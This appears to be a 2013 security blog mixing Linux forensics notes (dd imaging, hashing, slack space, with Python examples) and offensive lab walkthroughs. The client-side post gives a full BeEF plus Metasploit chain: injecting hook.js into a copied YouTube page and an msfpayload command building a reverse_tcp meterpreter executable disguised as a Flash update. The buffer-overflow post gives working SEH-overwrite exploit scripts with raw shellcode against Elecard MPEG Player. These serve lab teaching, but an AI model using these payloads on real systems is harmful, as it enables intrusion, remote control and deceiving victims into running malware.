codename scx030c06c
Friday, 24 May 2013
Linux commands for computer forensics
Here are some of the basic Linux commands used in computer forensics :
1. dd - copies from an input file or device to an output file or device block by block, which makes it the standard way to take a raw bit-for-bit image of evidence media. Add conv=noerror,sync so an unreadable sector is written as zeros instead of aborting the copy (every later byte then keeps its original offset), and read the source through a write blocker or a read-only mount so the evidence itself is never changed.
syntax : dd if=[source] of=[destination] bs=(optional) conv=noerror,sync
2. hdparm - shows the evidence hard disk's identification and configuration: model, serial number, firmware and sector count (hdparm -I), and whether a host protected area hides part of the disk (hdparm -N). Record this output before imaging so the image can be tied to the physical drive.
syntax : hdparm [ flags ] [device]
3. sfdisk and fdisk - show the disk structure: the partition table, partition types and start/end sectors. Run them against the image as well as the original disk to confirm both have the same layout.
syntax :
sfdisk [options] device
sfdisk -s [partition]
4. md5sum and sha1sum - compute and verify an MD5 or SHA-1 hash of a file or list of files (including devices). Hash the source before imaging and the image after, store the values with the chain-of-custody record, and re-check them with --check before and after analysis. MD5 and SHA-1 are both collision-prone, so record a SHA-256 as well (sha256sum, same syntax).
syntax :
md5sum [OPTION] [FILE]...
md5sum [OPTION] --check [FILE]
sha1sum [OPTION] [FILE]...
sha1sum [OPTION] --check [FILE]
5. mount - mount a file system. For evidence, mount the image read-only (for an image file: -o ro,loop,noatime) so the analysis never writes to it or updates access times.
syntax :
mount [-lhV]
mount -a [-fFnrsvw] [-t vfstype] [-O optlist]
mount [-fnrsvw] [-o options [,...]] device | dir
mount [-fnrsvw] [-t vfstype] [-o options] device dir
6. etc.
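The imaging and hashing steps above, as an added example that is not part of the original post: a small Python script that does what dd conv=noerror,sync followed by md5sum/sha1sum/sha256sum do, so the handling of an unreadable sector is visible. The "device" is a constructed file in a temporary directory, bad_blocks simulates read failures, and the hash logs use the two-space `<hex>  <name>` layout that md5sum --check reads.

```python
import hashlib
import os
import tempfile

BLOCK_SIZE = 512                     # plays the role of dd's bs=
ALGOS = ("md5", "sha1", "sha256")    # the post's two, plus a collision-resistant one


def acquire(src, dst, bad_blocks=frozenset(), block_size=BLOCK_SIZE):
    """Copy src to dst block by block, hashing the bytes as they are written.
    A block that fails to read is written as zeros of the same length
    (dd's conv=noerror,sync) so every later byte keeps its original offset.
    Returns ({algo: hexdigest}, [indices of failed blocks])."""
    digests = {name: hashlib.new(name) for name in ALGOS}
    failed = []
    size = os.path.getsize(src)
    nblocks = (size + block_size - 1) // block_size
    with open(src, "rb") as fin, open(dst, "wb") as fout:
        for index in range(nblocks):
            try:
                if index in bad_blocks:          # constructed read failure
                    raise OSError("I/O error reading block %d" % index)
                fin.seek(index * block_size)
                block = fin.read(block_size)
            except OSError:
                failed.append(index)
                block = b"\x00" * min(block_size, size - index * block_size)
            fout.write(block)
            for digest in digests.values():
                digest.update(block)
    return {name: d.hexdigest() for name, d in digests.items()}, failed


def write_hash_logs(image_path, hashes):
    """One `<hex>  <name>` line per algorithm, the layout `md5sum --check` reads."""
    name = os.path.basename(image_path)
    for algo, hexdigest in hashes.items():
        with open("%s.%s" % (image_path, algo), "w") as f:
            f.write("%s  %s\n" % (hexdigest, name))


def verify(image_path, algo):
    """Re-hash the image and compare with its log (what `--check` does)."""
    with open("%s.%s" % (image_path, algo)) as f:
        expected, _, name = f.readline().rstrip("\n").partition("  ")
    digest = hashlib.new(algo)
    with open(image_path, "rb") as f:
        for chunk in iter(lambda: f.read(BLOCK_SIZE), b""):
            digest.update(chunk)
    return name == os.path.basename(image_path) and digest.hexdigest() == expected


def demo():
    """Constructed evidence: five 512-byte sectors, sector 2 unreadable."""
    work = tempfile.mkdtemp()
    src = os.path.join(work, "evidence.raw")
    img = os.path.join(work, "evidence.dd")
    with open(src, "wb") as f:
        for i in range(5):
            f.write(bytes([0x41 + i]) * BLOCK_SIZE)   # AAAA..., BBBB..., ...
    hashes, failed = acquire(src, img, bad_blocks={2})
    write_hash_logs(img, hashes)
    verified = all(verify(img, algo) for algo in ALGOS)
    with open(img, "rb") as f:
        image = f.read()
    with open(img, "r+b") as f:        # flip one byte, as any write to the evidence would
        f.seek(100)
        f.write(b"\xff")
    return {
        "failed": failed,
        "verified": verified,
        "tampered_verified": verify(img, "sha256"),
        "image_size": len(image),
        "source_size": os.path.getsize(src),
        "zeroed": image[2 * BLOCK_SIZE:3 * BLOCK_SIZE] == b"\x00" * BLOCK_SIZE,
    }


if __name__ == "__main__":
    print(demo())
```

The hashes are computed over the bytes actually written, so they describe the image (including the zeroed sector), which is what later verification has to reproduce; the failed-block list belongs in the acquisition notes next to the hash values.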
Thursday, 23 May 2013
Computer Forensic : unallocated space and slack space
Unallocated space : Unallocated space, sometimes called "free space", is logical space on a hard drive that the operating system (e.g. Windows) can write to. To put it another way, it is the opposite of "allocated" space, which is where the operating system has already written files. Unallocated space can contain deleted files or partially deleted files. When a file is deleted, only the pointers to the file (its directory entry and allocation records) are removed; the data remains in unallocated space until the operating system stores another file in the same space and overwrites it. This is why deleted files can often be recovered, and why the evidence should be imaged before the system writes anything further.
Slack space : Slack space refers to the portions of a hard drive that are not fully used by the currently allocated file and which may still contain data from a previously deleted file. Slack space, sometimes referred to as file slack, is the area between the end of a file and the end of the last cluster or sector used by the file in question. Slack space is more significant in file systems that use a large cluster size, while a file system that uses a small cluster size uses the storage media more efficiently. A cluster is the smallest unit of storage that the operating system allocates to a file. When a file is written and does not occupy its entire last cluster, the remaining space is slack space; whatever that cluster held before (for example the tail of a deleted file) stays there until the file grows into it.
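Both definitions above, as an added example that is not part of the original post: a toy cluster-addressed volume in Python where a file's data is written without clearing the rest of its last cluster, so the slack of a new small file still holds the tail of a deleted larger one, and the deleted file's other clusters sit in unallocated space. The 4096-byte cluster size, the file contents and the volume size are constructed. One caveat the toy does not model: modern file systems zero-fill the rest of the last sector at write time, so on a real disk only the untouched sectors between that point and the end of the cluster keep old data.

```python
CLUSTER = 4096   # bytes per cluster (constructed; a common default)


def clusters_needed(size, cluster=CLUSTER):
    """Number of whole clusters a file of `size` bytes occupies."""
    return -(-size // cluster)          # ceiling division


def slack_bytes(size, cluster=CLUSTER):
    """Bytes between the end of the file and the end of its last cluster."""
    return clusters_needed(size, cluster) * cluster - size


class ToyVolume:
    """Clusters on a bytearray plus an allocation table: name -> (first cluster, size).
    Files are stored contiguously (first fit) to keep the example short."""

    def __init__(self, nclusters, cluster=CLUSTER):
        self.cluster = cluster
        self.disk = bytearray(nclusters * cluster)   # brand-new media: all zeros
        self.table = {}

    def allocated_clusters(self):
        used = set()
        for first, size in self.table.values():
            used.update(range(first, first + clusters_needed(size, self.cluster)))
        return used

    def write(self, name, data):
        need = clusters_needed(len(data), self.cluster)
        used = self.allocated_clusters()
        total = len(self.disk) // self.cluster
        for first in range(total - need + 1):
            if not used.intersection(range(first, first + need)):
                break
        else:
            raise OSError("volume full")
        start = first * self.cluster
        # only the file's own bytes are written; the tail of the last cluster
        # keeps whatever the media held before (this is the slack)
        self.disk[start:start + len(data)] = data
        self.table[name] = (first, len(data))

    def delete(self, name):
        del self.table[name]     # the pointer goes, the bytes stay on the media

    def slack(self, name):
        """The file slack of `name`: bytes the OS never returns when reading the file."""
        first, size = self.table[name]
        end = first * self.cluster + size
        last = (first + clusters_needed(size, self.cluster)) * self.cluster
        return bytes(self.disk[end:last])

    def unallocated(self):
        """Every cluster no current file owns, concatenated: where deleted data lives."""
        used = self.allocated_clusters()
        return b"".join(bytes(self.disk[c * self.cluster:(c + 1) * self.cluster])
                        for c in range(len(self.disk) // self.cluster) if c not in used)


def demo():
    """A 6000-byte document is deleted, then a 1000-byte note reuses its first cluster."""
    vol = ToyVolume(nclusters=4)
    vol.write("report.doc", b"S" * 6000)    # occupies clusters 0 and 1
    vol.delete("report.doc")                # unlinked, not wiped
    vol.write("note.txt", b"N" * 1000)      # first fit: cluster 0 again
    return {
        "slack_len": slack_bytes(1000),     # 3096
        "slack": vol.slack("note.txt"),     # 3096 bytes of the old report
        "unallocated": vol.unallocated(),   # clusters 1..3: 1904 old bytes, then zeros
    }


if __name__ == "__main__":
    result = demo()
    print(result["slack_len"], result["slack"][:16], result["unallocated"][:16])
```

Reading note.txt through the file system returns 1000 bytes of N; reading the raw cluster returns those plus 3096 bytes of the deleted report, which is exactly what a carving tool run over slack and unallocated space is looking for.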
Computer Forensic : Introduction
Hello again, today's blog post is about computer forensics, one of my favourite subjects in the computer security world. What is computer forensics? Computer forensics is the application of investigation and analysis techniques to gather and preserve evidence from a particular computing device in a way that is suitable for presentation in a court of law. The goal of computer forensics is to perform a structured investigation while maintaining a documented chain of evidence, to find out exactly what happened on a computing device and who was responsible for it. Computer forensics involves the preservation, identification, extraction, interpretation, and documentation of computer evidence.
So, what is the difference between computer forensics and digital forensics? Digital forensics (sometimes known as digital forensic science) is a branch of forensic science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. The term digital forensics was originally used as a synonym for computer forensics but has expanded to cover the investigation of all devices capable of storing digital data.
There are 4 phases of digital forensics :
1. Identification (crime scene) --> identify all of the digital evidence
2. Collection (lab)
a. Chain of custody --> collect, label and document all of the digital evidence
b. Acquisition --> make forensic copies (clones or images) of the digital evidence
c. Fingerprint --> compute and record a hash of each copy so it can later be shown to be unchanged
3. Analysis (lab)
a. Chain of custody --> set the digital evidence to read-only
b. Analysis --> perform the analysis on the copy of the digital evidence, never on the original
c. Collection --> summarize the results found
d. Reconstruction --> place the findings on a timeline and reconstruct the case
4. Presentation (court / law)
There are 2 states the evidence can be in when performing forensic activity :
1. Live : the digital evidence is still running/turned on. In this case the investigator can also capture the RAM, which is lost once the machine is powered off.
2. Dead : the digital evidence has been turned off.
Monday, 20 May 2013
From web application to ID 0
How do you gain access to the local system from a web application? In this post I will simulate the process of gaining access using DVWA installed on the Metasploitable OS as the target. I will use one of DVWA's several vulnerabilities to penetrate the system, upload a backdoor command shell, gain root access, and do some post-exploitation activities.
--on progress--
Sunday, 19 May 2013
Client side attack combination using BeEF and Metasploit
Hello again, in this post I will simulate a client-side attack using BeEF and Metasploit. A client-side attack targets client software (here the web browser) rather than a server, and relies on the victim opening something the attacker controls. In this simulation I am using Windows XP in VirtualBox with the Firefox browser as the target.
Here's the gameplay :
1. the attacker sends the target a link to a copy of a YouTube page that contains BeEF's hook.js
2. when the target opens the link, BeEF hooks the browser
3. the attacker sends a fake update .exe that contains a Metasploit payload
4. the target runs the update and the system is pwned
And here are the steps :
- choose a video on YouTube, save the page as youtube.html and put it in /var/www/
- run BeEF from the menu: backtrack > exploitation > social engineering tools > BeEF
- modify youtube.html and insert the hook.js script tag
- open the modified html file in the target's browser
- open the BeEF panel in BackTrack's browser; the address is 192.168.56.1:3000/ui/panel
- the target's browser is now hooked by BeEF
- create the fake update exe with Metasploit (msfpayload and msfencode have since been merged into msfvenom)
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=1234 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/flashupdate.exe
- run Metasploit (msfconsole) and listen on port 1234
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set LPORT 1234
exploit
- push the payload file to the hooked browser with BeEF's redirect browser command
- the target executes the file and the reverse shell connects back to the handler
- Voila! the system is pwned!
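The "insert the hook.js" step and its mirror image on the defender's side, as an added example that is not code from the original post: a Python helper that injects BeEF's hook script into a saved HTML page, and a check that lists external scripts loaded from hosts outside an expected set or from a private address, which is what the injected hook looks like in a saved youtube.com page. The hook URL 192.168.56.1:3000/hook.js matches the post's lab (hook.js at the root of BeEF's HTTP port is BeEF's default); the HTML and the allowed-host list are constructed.

```python
import ipaddress
import re
from urllib.parse import urlparse

HOOK_URL = "http://192.168.56.1:3000/hook.js"   # post's BeEF host; hook.js is BeEF's default path


def inject_hook(html, hook_url=HOOK_URL):
    """Insert <script src=hook_url> just before </head> so it runs as soon as the
    browser parses the saved page; fall back to </body>, then to appending."""
    tag = '<script src="%s"></script>' % hook_url
    lowered = html.lower()
    for closing in ("</head>", "</body>"):
        idx = lowered.find(closing)
        if idx != -1:
            return html[:idx] + tag + html[idx:]
    return html + tag


# any <script ... src=...> tag; the src value may be quoted or bare
SCRIPT_SRC = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)


def is_private_host(host):
    """True for RFC 1918 / loopback / link-local addresses such as 192.168.56.1."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False   # a hostname, not an IP literal


def suspicious_scripts(html, allowed_hosts):
    """External scripts a saved page should not be loading: hosts outside the
    allow list (assumed to be the page's own CDN hosts) or private addresses."""
    hits = []
    for src in SCRIPT_SRC.findall(html):
        host = urlparse(src).hostname
        if host is None:
            continue       # relative URL: same origin as the page
        if is_private_host(host) or host not in allowed_hosts:
            hits.append(src)
    return hits


# constructed stand-in for the saved youtube.html
SAVED_PAGE = """<!DOCTYPE html>
<html><head><title>video</title>
<script src="https://s.ytimg.com/yts/jsbin/player.js"></script>
</head><body><div id="player"></div>
<script src="/yts/js/base.js"></script>
</body></html>"""

ALLOWED = {"www.youtube.com", "s.ytimg.com"}   # assumed legitimate script hosts

if __name__ == "__main__":
    hooked = inject_hook(SAVED_PAGE)
    print(suspicious_scripts(SAVED_PAGE, ALLOWED))   # []
    print(suspicious_scripts(hooked, ALLOWED))       # ['http://192.168.56.1:3000/hook.js']
```

The same check works on a proxy log or a browser's network trace: a page from a public site pulling JavaScript from a private address is the tell, whatever the script is called.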
Wednesday, 24 April 2013
Buffer Overflow : SEH based exploit on Elecard MPEG Player
In this post I will write up my steps to exploit a media player application (Elecard MPEG Player) by overwriting its SEH handler, and here are the steps :
1. install the application on a Windows XP machine
2. do the information gathering about the supported file types
3. from IG I got the information : the target supports .m3u files and needs a header
4. create the fuzzer file with Python
filename = "seh.m3u"
junk = b"#EXTM3U\n"          # header the player expects
junk += b"\x41" * 15000      # 15000 'A's to overflow the buffer
with open(filename, "wb") as f:
    f.write(junk)
print("file created successfully...")
5. run the script to generate the m3u file
6. run the target and load the m3u fuzzer
7. the target crashes
8. now open the target in OllyDbg to see what actually happened
9. run the target and load the m3u fuzzer
10. the target crashes. look at the top left box: EBP and ESI are overwritten, but EIP is not. The overflow raises an access violation before the function returns, so the exception dispatcher (SEH) takes over before the overwritten return address is ever used
11. to see the handler go to View > SEH chain. press Shift+F9 to pass the exception to the program; the overwritten handler address is then loaded into EIP
12. the next step is to create a pattern with Metasploit (pattern_create) and insert it into the fuzzer script
13. run the target from OllyDbg and load the m3u fuzzer
14. read the address in the SEH chain and find the offset with Metasploit (pattern_offset)
15. the offset is 8, which means 8 bytes of padding sit before the SEH handler; the 4 bytes just before it (offset 4) are nSEH, the pointer to the next record
16. change the fuzzer script to confirm the exact position of SEH: the marker 0xDEADBEEF should land in the handler
filename = "music.m3u"
junk = b"#EXTM3U\n"
junk += b"\x90" * 8                # 8 bytes of padding up to the handler
junk += b"\xEF\xBE\xAD\xDE"        # 0xDEADBEEF, little-endian marker
junk += b"\x90" * (15000 - len(junk))
with open(filename, "wb") as f:
    f.write(junk)
print("file created successfully...")
17. okay, the SEH handler now reads 0xDEADBEEF, so the offset is confirmed
18. the next step is to find a module that contains a POP POP RETN sequence but is not compiled with SafeSEH protection
19. I will try to use the esrcnet.dll module
20. now search for a POP POP RETN sequence in the D3DIM7300 module
21. modify the fuzzer script
filename = "music.m3u"
junk = b"#EXTM3U\n"
junk += b"\x90" * 4
junk += b"\xeb\x06\x90\x90"        # nSEH: jmp short +6, over the handler address
junk += b"\xA6\xA0\x94\x73"        # SEH: address of the POP POP RETN sequence (POP ESI first), 0x7394A0A6 little-endian
junk += b"\x90" * (15000 - len(junk))
with open(filename, "wb") as f:
    f.write(junk)
print("file created successfully...")
22. generate the payload with msfweb; in this case I use a payload that launches the calculator
23. insert the payload into the fuzzer script and run it
filename = "music.m3u"
junk = b"#EXTM3U\n"
junk += b"\x90" * 4
junk += b"\xeb\x06\x90\x90"        # nSEH: jmp short +6
junk += b"\xA6\xA0\x94\x73"        # SEH: POP POP RETN
junk += b"\x90" * 16               # NOP sled the short jump lands in
junk += (b"\xbb\x10\xbf\xd7\x63\x29\xc9\xda\xc4\xd9\x74\x24\xf4\x5a\xb1\x23"
         b"\x31\x5a\x10\x83\xc2\x04\x03\x4a\xb3\x35\x96\x96\x23\xfd\x59\x66"
         b"\xb4\x75\x1c\x5a\x3f\xf5\x9a\xda\x3e\xe9\x2e\x55\x59\x7e\x6f\x49"
         b"\x58\x6b\xd9\x02\x6e\xe0\xdb\xfa\xbe\x36\x42\xae\x45\x76\x01\xa9"
         b"\x84\xbd\xe7\xb4\xc4\xa9\x0c\x8d\x9c\x09\xe9\x84\xf9\xd9\xae\x42"
         b"\x03\x35\x36\x01\x0f\x82\x3c\x4a\x0c\x15\xa8\xff\x30\x9e\x2f\x14"
         b"\xc1\xfc\x0b\xee\x11\xcd\x93\x8a\x1e\x6e\x24\xd7\xe1\x17\x48\x5c"
         b"\xa1\xeb\xdb\x12\x3e\x59\x50\xba\x36\x4a\x6e\xb1\xc7\x3c\x71\xc5"
         b"\xc7\xb7\x1a\xf9\x98\xf6\x2c\x61\x71\x70\x28\xe2\xbd\xf9\x99\x8c"
         b"\x43\x26\xfb\x3f\xd4\x4e\x02\x35\x2a\x38\x04\xae\x50\xa7\x96\x53"
         b"\x97")                  # calc payload from msfweb
junk += b"\x90" * (15000 - len(junk))
with open(filename, "wb") as f:
    f.write(junk)
print("file created successfully...")
24. run the target without OllyDbg, load the m3u file and see what happens
25. voila! the target is pwned!
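The pattern and layout work in steps 12 to 23, as an added example that is not code from the original post: Metasploit's pattern_create / pattern_offset reimplemented in Python, plus a builder for the SEH-overwrite .m3u that derives the layout from the offset instead of hand-counted padding and refuses shellcode containing bytes the line-based .m3u parser would cut on. The POP POP RETN address 0x7394A0A6 and the offset of 8 are the values reported in the post; the INT3 placeholder shellcode, the 16-byte sled, the bad-character set (NUL, CR, LF) and the sample DWORD 0x33614132 are assumptions.

```python
import struct
from string import ascii_uppercase, ascii_lowercase, digits

HEADER = b"#EXTM3U\n"             # the player needs this line before the crash data
POP_POP_RET = 0x7394A0A6          # from the post: \xA6\xA0\x94\x73 read little-endian
SEH_OFFSET = 8                    # from the post: pattern_offset reported 8
JMP_SHORT_6 = b"\xeb\x06\x90\x90" # nSEH: jmp +6, over the 4-byte handler address
BAD_BYTES = b"\x00\x0a\x0d"       # assumed: NUL and line breaks cut a .m3u line short


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...): the triplets do not repeat
    within the first 20280 bytes, so a DWORD read off the crash pins down one offset."""
    out = bytearray()
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern, value):
    """`value` is the DWORD OllyDbg shows in the SEH chain (already little-endian)
    or the raw 4 bytes; returns its offset in the pattern, or -1."""
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    return pattern.find(needle)


def bad_bytes_in(shellcode, bad=BAD_BYTES):
    """Set of forbidden byte values that occur in the shellcode (empty is good)."""
    return set(shellcode) & set(bad)


def build_m3u(shellcode, seh_offset=SEH_OFFSET, handler=POP_POP_RET,
              total=15000, sled=16, bad=BAD_BYTES):
    """Layout after the header:
    [pad][nSEH: jmp short +6][SEH: pop pop ret][nop sled][shellcode][filler].
    pop/pop/ret returns into nSEH, the jmp skips the handler DWORD, execution
    lands in the sled and runs the shellcode."""
    found = bad_bytes_in(shellcode, bad)
    if found:
        raise ValueError("shellcode contains bad bytes: %s" % sorted(found))
    if seh_offset < 4:
        raise ValueError("no room for nSEH before the handler")
    body = b"\x90" * (seh_offset - 4)
    body += JMP_SHORT_6
    body += struct.pack("<I", handler)
    body += b"\x90" * sled + shellcode
    if len(body) > total:
        raise ValueError("payload does not fit in the %d-byte crash length" % total)
    body += b"\x90" * (total - len(body))   # keep the length that triggered the crash
    return HEADER + body


def write_file(path, data):
    with open(path, "wb") as f:
        f.write(data)
    return len(data)


if __name__ == "__main__":
    pattern = pattern_create(15000)
    write_file("pattern.m3u", HEADER + pattern)
    # sample DWORD as OllyDbg's SEH chain would show it for this pattern (assumed)
    print("offset:", pattern_offset(pattern, 0x33614132))   # 8, the post's value
    write_file("music.m3u", build_m3u(b"\xcc" * 4))         # INT3s: placeholder shellcode
```

Pass pattern_offset the integer OllyDbg displays (it already shows the DWORD little-endian) or the raw bytes; the builder keeps the file at the same 15000 bytes that produced the crash, since a different length can move the handler record.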